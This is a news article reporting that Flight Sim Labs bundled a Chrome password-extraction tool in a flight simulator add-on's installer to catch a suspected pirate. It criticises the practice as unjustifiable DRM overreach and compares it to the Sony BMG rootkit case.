Flight simulator comes bundled with password stealing stowaway

How far should a software company be able to go to protect its products from piracy?

Not, one would assume, as far as deploying a Chrome password capture tool in its downloads. Yet this was the extraordinary accusation levelled at Flight Sim Labs (FSLabs) last weekend by a perplexed Reddit user.

The company makes flight simulation mods, one of which – an Airbus A320X add-on for Lockheed Martin’s pro-level Prepar3D – was setting off antivirus security software during installation.

As the user suspected – subsequently confirmed by pen-testing company Fidus Information Security –  the offending file, test.exe, was an executable for something called SecurityXploded. Explains Fidus:

The command line-based tool allows users to extract saved usernames and passwords from the Google Chrome browser and have them displayed in a readable format.

Under pressure, FSLabs quickly owned up to what it was doing and, moreover, why it was doing it.

According to founder and CEO, Lefteris Kalamaras, the tool captured passwords but not indiscriminately (FSLabs’ emphasis):

There are no tools used to reveal any sensitive information of any customer who has legitimately purchased our products.

The tool only activated if the user had installed the software using a pirated serial number believed to be circulating on the internet.

That program is only extracted temporarily and is never under any circumstances used in legitimate copies of the product.

It was so narrowly targeted, in fact, that the whole scheme was intended to gather evidence against a single individual believed to be circulating license keys for FSLabs’ software.

The company has since set out its side of events in more detail, which hasn’t stopped its behaviour going down badly.

With the Reddit negativity into the red zone, the company then backtracked, uploading a new version of the installer with the problem test.exe removed.

Legitimate action to stop pirates ripping off software or digital rights management (DRM) overreach?

This is easily answered: installing a tool designed to capture user data without consent, however narrowly configured, is hard to justify, ethically or technically.

Even ignoring the hypothetical possibility of misuse of such a capability, Fidus discovered the routine was designed to send data across an unencrypted HTTP channel encoded in nothing more secure than Base64.

The company appears to have been using the tool for months, having reportedly admitted in a forum post that users should turn off their antivirus in case test.exe set it off. This was, and is, bad advice that unnecessarily exposes customers to risk.

Undocumented DRM has a history of leading to trouble when customers find out about it – just ask Sony BMG, hauled over the coals in 2005 for using CD protection that behaved like a rootkit.

As with Sony before it, FSLabs should have asked themselves how it would look if its users ever found it, what legal and regulatory bodies might do if they found it, and what hay criminals might make with it if they found it.